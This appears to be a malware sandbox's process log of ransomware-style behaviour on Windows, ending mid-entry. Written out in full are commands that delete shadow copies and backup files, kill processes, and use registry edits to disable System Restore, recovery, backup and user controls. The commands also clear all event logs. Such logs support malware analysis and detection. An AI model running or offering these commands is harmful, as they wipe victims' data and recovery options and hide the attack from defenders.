C:\Windows\system32\cmd.exe /c sc config SstpSvc start= disabled
2⤵
PID:1304

C:\Windows\system32\sc.exe
sc config SstpSvc start= disabled
3⤵
- Launches sc.exe
PID:1684

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /IM mspub.exe /F
2⤵
PID:3452

C:\Windows\system32\taskkill.exe
taskkill /IM mspub.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4092

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /IM mydesktopqos.exe /F
2⤵
PID:1440

C:\Windows\system32\taskkill.exe
taskkill /IM mydesktopqos.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4888

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /IM mydesktopservice.exe /F
2⤵
PID:4532

C:\Windows\system32\taskkill.exe
taskkill /IM mydesktopservice.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1032

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet
2⤵
PID:4916

C:\Windows\system32\vssadmin.exe
vssadmin Delete Shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2376

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
2⤵
PID:4708

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
3⤵
- Interacts with shadow copies
PID:2756

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
2⤵
PID:4592

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
3⤵
- Interacts with shadow copies
PID:2020

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
2⤵
PID:4088

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1560

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
2⤵
PID:4276

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4584

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
2⤵
PID:4372

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3732

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
2⤵
PID:1596

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1812

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
2⤵
PID:3432

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4668

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
2⤵
PID:4100

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3568

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
2⤵
PID:536

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1188

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
2⤵
PID:744

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4348

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
2⤵
PID:4648

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1728

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
2⤵
PID:4288

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3692

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet
2⤵
PID:220

C:\Windows\system32\vssadmin.exe
vssadmin Delete Shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2668

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q c:*.bac c:*.bak c:*.wbcat c:*.bkf c:Backup*.* c:ackup*.* c:*.set c:*.win
2⤵
PID:1068

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q d:*.bac d:*.bak d:*.wbcat d:*.bkf d:Backup*.* d:ackup*.* d:*.set d:*.win
2⤵
PID:4696

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q e:*.bac e:*.bak e:*.wbcat e:*.bkf e:Backup*.* e:ackup*.* e:*.set e:*.win
2⤵
PID:1836

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q f:*.bac f:*.bak f:*.wbcat f:*.bkf f:Backup*.* f:ackup*.* f:*.set f:*.win
2⤵
PID:3712

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q g:*.bac g:*.bak g:*.wbcat g:*.bkf g:Backup*.* g:ackup*.* g:*.set g:*.win
2⤵
PID:2088

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q h:*.bac h:*.bak h:*.wbcat h:*.bkf h:Backup*.* h:ackup*.* h:*.set h:*.win
2⤵
PID:3756

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del %0
2⤵
PID:1912

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s hrmlog2
2⤵
PID:2024

C:\Windows\system32\attrib.exe
attrib +h +s hrmlog2
3⤵
- Views/modifies file attributes
PID:2716

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\hrmlog2
2⤵
PID:1484

C:\Windows\system32\attrib.exe
attrib +h +s C:\ProgramData\hrmlog2
3⤵
- Views/modifies file attributes
PID:4332

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f
2⤵
PID:100

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f
3⤵
PID:280

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f
2⤵
PID:296

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f
3⤵
PID:3396

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
2⤵
PID:4632

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
3⤵
PID:1528

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f
2⤵
PID:1452

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f
3⤵
PID:512

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f
2⤵
PID:212

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f
3⤵
PID:4976

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f
2⤵
PID:1372

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f
3⤵
PID:3424

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
2⤵
PID:1868

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
3⤵
PID:2568

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
2⤵
PID:3456

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
3⤵
PID:3436

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f
2⤵
PID:4004

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f
3⤵
PID:2256

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f
2⤵
PID:2288

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f
3⤵
PID:3288

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
2⤵
PID:3476

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
3⤵
PID:1900

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
2⤵
PID:3284

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
3⤵
PID:2516

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
2⤵
PID:2988

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
3⤵
PID:3884

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f
2⤵
PID:444

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f
3⤵
PID:4504

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
2⤵
PID:3968

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
3⤵
PID:5024

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f
2⤵
PID:3932

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f
3⤵
PID:384

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
2⤵
PID:4056

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
3⤵
PID:1908

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
2⤵
PID:4084

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
3⤵
PID:3144

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
2⤵
PID:3560

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
3⤵
PID:4512

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
2⤵
PID:4092

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
3⤵
PID:3752

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
2⤵
PID:5096

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
3⤵
PID:3848

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
2⤵
PID:1032

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
3⤵
PID:4532

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
2⤵
PID:4344

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
3⤵
PID:4680

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
2⤵
PID:2376

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
3⤵
PID:2276

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
2⤵
PID:2756

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
3⤵
PID:4992

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
2⤵
PID:4376

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
3⤵
PID:1704

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
2⤵
PID:1460

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
3⤵
PID:4864

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
2⤵
PID:4508

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
3⤵
PID:1876

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
2⤵
PID:4584

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
3⤵
PID:4276

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
2⤵
PID:2356

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
3⤵
PID:456

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
2⤵
PID:4712

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
3⤵
PID:4452

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
2⤵
PID:1584

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
3⤵
PID:8

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c for /F "tokens=*" %s in ('wevtutil.exe el') DO wevtutil.exe cl "%s"
2⤵
PID:1112

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wevtutil.exe el
3⤵
PID:4792

C:\Windows\system32\wevtutil.exe
wevtutil.exe el
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1172

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "AMSI/Debug"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3568

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "AirSpaceChannel"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4100

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Analytic"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3204

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Application"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1104

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "DirectShowFilterGraph"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3036

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "DirectShowPluginControl"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1764

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Els_Hyphenation/Analytic"
3⤵
PID:2464

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "EndpointMapper"
3⤵
PID:3392

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "FirstUXPerf-Analytic"
3⤵
PID:844

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "ForwardedEvents"
3⤵
- Clears Windows event logs
PID:4648

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "General Logging"
3⤵
PID:4128

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "HardwareEvents"
3⤵
PID:1316

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "IHM_DebugChannel"
3⤵
PID:2688

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Intel-iaLPSS-GPIO/Analytic"
3⤵
PID:4292

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Intel-iaLPSS-I2C/Analytic"
3⤵
PID:2444

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Intel-iaLPSS2-GPIO2/Debug"
3⤵
PID:4676

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Intel-iaLPSS2-GPIO2/Performance"
3⤵
PID:3896

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Intel-iaLPSS2-I2C/Debug"
3⤵
PID:1064

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Intel-iaLPSS2-I2C/Performance"
3⤵
- Clears Windows event logs
PID:1548

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Internet Explorer"
3⤵
PID:3400

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Key Management Service"
3⤵
PID:4524

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MF_MediaFoundationDeviceMFT"
3⤵
PID:4964

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MF_MediaFoundationDeviceProxy"
3⤵
PID:3552

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MF_MediaFoundationFrameServer"
3⤵
PID:4700

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MedaFoundationVideoProc"
3⤵
PID:2948

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MedaFoundationVideoProcD3D"
3⤵
PID:2880

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationAsyncWrapper"
3⤵
PID:292

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationContentProtection"
3⤵
PID:268

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationDS"
3⤵
PID:3164

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationDeviceProxy"
3⤵
PID:1412

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationMP4"
3⤵
PID:4412

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationMediaEngine"
3⤵
PID:4408

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationPerformance"
3⤵
PID:3064

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationPerformanceCore"
3⤵
PID:3468

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationPipeline"
3⤵
PID:212

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationPlatform"
3⤵
- Clears Windows event logs
PID:2244

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationSrcPrefetch"
3⤵
PID:1480

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-AppV-Client-Streamingux/Debug"
3⤵
PID:3016

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-AppV-Client/Admin"
3⤵
PID:1868

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-AppV-Client/Debug"
3⤵
PID:3436

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-AppV-Client/Operational"
3⤵
PID:3456

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-AppV-Client/Virtual Applications"
3⤵
PID:1844

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-AppV-SharedPerformance/Analytic"
3⤵
PID:2664

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Admin"
3⤵
PID:2256

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Debug"
3⤵
PID:2288

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Diagnostic"
3⤵
PID:1900

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-IE/Diagnostic"
3⤵
PID:3488

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-IEFRAME/Diagnostic"
3⤵
PID:3368

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-JSDumpHeap/Diagnostic"
3⤵
PID:4940

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-OneCore-Setup/Analytic"
3⤵
PID:3916

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-PerfTrack-IEFRAME/Diagnostic"
3⤵
PID:3644

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-PerfTrack-MSHTML/Diagnostic"
3⤵
PID:5116

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-User Experience Virtualization-Admin/Debug"
3⤵
PID:652

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-User Experience Virtualization-Agent Driver/Debug"
3⤵
PID:1308

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-User Experience Virtualization-Agent Driver/Operational"
3⤵
PID:4228

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Analytic"
3⤵
PID:3932

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Debug"
3⤵
PID:1908

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Operational"
3⤵
PID:4056

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-User Experience Virtualization-IPC/Operational"
3⤵
PID:3144

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Analytic"
3⤵
PID:2808

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Debug"
3⤵
PID:4084

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Operational"
3⤵
PID:3560

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AAD/Analytic"
3⤵
PID:3752

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AAD/Operational"
3⤵
PID:4092

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ADSI/Debug"
3⤵
PID:3848

C:\Windows\system32\wevtutil.exe
